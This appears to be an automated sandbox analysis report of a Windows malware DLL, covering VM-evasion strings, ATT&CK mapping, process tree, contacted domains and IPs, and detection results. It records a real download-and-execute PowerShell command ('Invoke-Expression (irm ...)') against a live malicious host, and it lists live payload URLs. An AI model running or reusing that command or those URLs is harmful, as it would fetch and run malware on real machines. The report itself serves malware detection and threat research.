Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2042532242.000001E645C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000015.00000003.2075574842.0000000003133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: mshta.exe, 0000000D.00000003.2054401782.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: mshta.exe, 0000000D.00000003.2054401782.0000000002F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}z
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 00000012.00000002.2067339050.000001F4265D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446067 Sample: SecuriteInfo.com.W64.Agent.... Startdate: 22/05/2024 Architecture: WINDOWS Score: 64 42 iapartmentlistings.com 2->42 44 www.siguefutbol.com 2->44 46 siguefutbol.com 2->46 52 Antivirus detection for URL or domain 2->52 54 Machine Learning detection for sample 2->54 56 Sigma detected: Suspicious MSHTA Child Process 2->56 58 2 other signatures 2->58 10 loaddll64.exe 1 2->10         started        signatures3 process4 process5 12 rundll32.exe 3 15 10->12         started        15 rundll32.exe 13 10->15         started        17 cmd.exe 1 10->17         started        19 3 other processes 10->19 dnsIp6 48 siguefutbol.com 194.124.213.167, 443, 49707 SOLNETCH unknown 12->48 21 mshta.exe 1 12->21         started        23 mshta.exe 15->23         started        25 rundll32.exe 17->25         started        27 WerFault.exe 16 19->27         started        29 WerFault.exe 16 19->29         started        process7 process8 31 powershell.exe 15 16 21->31         started        34 powershell.exe 23->34         started        36 WerFault.exe 20 18 25->36         started        dnsIp9 50 iapartmentlistings.com 91.222.173.38, 49713, 49715, 49733 KICUA-ASGI Ukraine 31->50 38 conhost.exe 31->38         started        40 conhost.exe 34->40         started        process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll8%ReversingLabs
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
http://iapartmentlistings.com/tykhwuxk100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt5100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen3a413cab4a1b175a1b32871e89100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt4100%Avira URL Cloudmalware
https://www.siguefutbol.com/0%Avira URL Cloudsafe
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtK100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
iapartmentlistings.com
91.222.173.38
truetrue
    		unknown
    siguefutbol.com
    		194.124.213.167
    		truefalse
      		unknown
      www.siguefutbol.com
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://iapartmentlistings.com/tykhwuxkfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtfalse
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt5rundll32.exe, 0000000C.00000002.2042532242.000001E645BC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2042532242.000001E645BC0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt4rundll32.exe, 0000000C.00000002.2042532242.000001E645CA0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://upx.sf.netAmcache.hve.10.drfalse
        • URL Reputation: safe
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3rundll32.exe, 0000000C.00000002.2042532242.000001E645BC8000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/rundll32.exe, 0000000C.00000002.2042532242.000001E645C10000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtKrundll32.exe, 0000000C.00000002.2042532242.000001E645C32000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen3a413cab4a1b175a1b32871e89rundll32.exe, 00000003.00000002.2276044062.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2251145604.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2263775399.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllfalse
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        194.124.213.167
        		siguefutbol.comunknown
        		9044SOLNETCHfalse
        91.222.173.38
        		iapartmentlistings.comUkraine
        		39249KICUA-ASGItrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446067
        Start date and time:2024-05-22 22:07:49 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 32s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:27
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll
        (renamed file extension from exe to dll)
        Original Sample Name:SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.exe
        Detection:MAL
        Classification:mal64.winDLL@27/21@2/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 3

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 52.168.117.173
        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target rundll32.exe, PID 5836 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll

        Simulations

        Behavior and APIs

        TimeTypeDescription
        16:08:40API Interceptor2x Sleep call for process: mshta.exe modified
        16:08:40API Interceptor1036x Sleep call for process: powershell.exe modified
        16:08:41API Interceptor1x Sleep call for process: loaddll64.exe modified
        16:09:00API Interceptor3x Sleep call for process: WerFault.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        194.124.213.167SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dllGet hashmaliciousUnknownBrowse
          Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
            Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
              bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                  UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                    UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      91.222.173.38SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk
                      d.htaGet hashmaliciousUnknownBrowse
                      • iapartmentlistings.com/tykhwuxk

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      iapartmentlistings.comSecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      d.htaGet hashmaliciousUnknownBrowse
                      • 91.222.173.38

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SOLNETCHSecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      8DR4MV2b0i.elfGet hashmaliciousMiraiBrowse
                      • 212.101.2.142
                      vniiXJivdo.elfGet hashmaliciousMiraiBrowse
                      • 212.41.74.143
                      cqf3hb5Qxg.elfGet hashmaliciousMiraiBrowse
                      • 212.41.74.181
                      KICUA-ASGISecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      Zx36YY26yi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      bj2KkXCfKi.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      d.htaGet hashmaliciousUnknownBrowse
                      • 91.222.173.38
                      umkglnks.ps1Get hashmaliciousDarkGate, MailPassViewBrowse
                      • 91.222.173.186
                      1.htaGet hashmaliciousDarkGate, MailPassViewBrowse
                      • 91.222.173.186

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      37f463bf4616ecd445d4a1937da06e19PEDIDO 12433.PDF.exeGet hashmaliciousGuLoaderBrowse
                      • 194.124.213.167
                      SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dllGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      Freigabeerkl#U00e4rung..exeGet hashmaliciousGuLoaderBrowse
                      • 194.124.213.167
                      factboletaeletricge.msiGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      SOLICITUD DE PRESUPUESTO.exeGet hashmaliciousGuLoaderBrowse
                      • 194.124.213.167
                      a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                      • 194.124.213.167
                      Shipping document.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 194.124.213.167
                      Receipt #761.vbsGet hashmaliciousUnknownBrowse
                      • 194.124.213.167
                      Shipping Docu + BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 194.124.213.167
                      Swift mt103 483932024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 194.124.213.167

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_3ca5399a-1b69-4c7a-8d8c-7161ee13ae5d\Report.wer

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8336074514956568
                      Encrypted:false
                      SSDEEP:192:eVyiHy4jd0sZ6heBjxuzuiFRZ24lO8S1:6yiS4jeswheBjYzuiFRY4lO8S
                      MD5:F6AFE8C13F7AFE467CF641D7AC86D1B7
                      SHA1:4CF84B1E94BAB1A1D5906CFF299B13168ABF6F49
                      SHA-256:8C35680C3AE714464D3F704A09532121ABB5052536D8A92D812928732600B7AD
                      SHA-512:A399DD84A9F8A2D76169BBFADD4E6245F1C9ED148B2054CA12E7E2D6E0E4AB5596562284EDFCE27BE072AC65F08284009B9C2340AC49FA71909DABD3D17550A6
                      Malicious:false
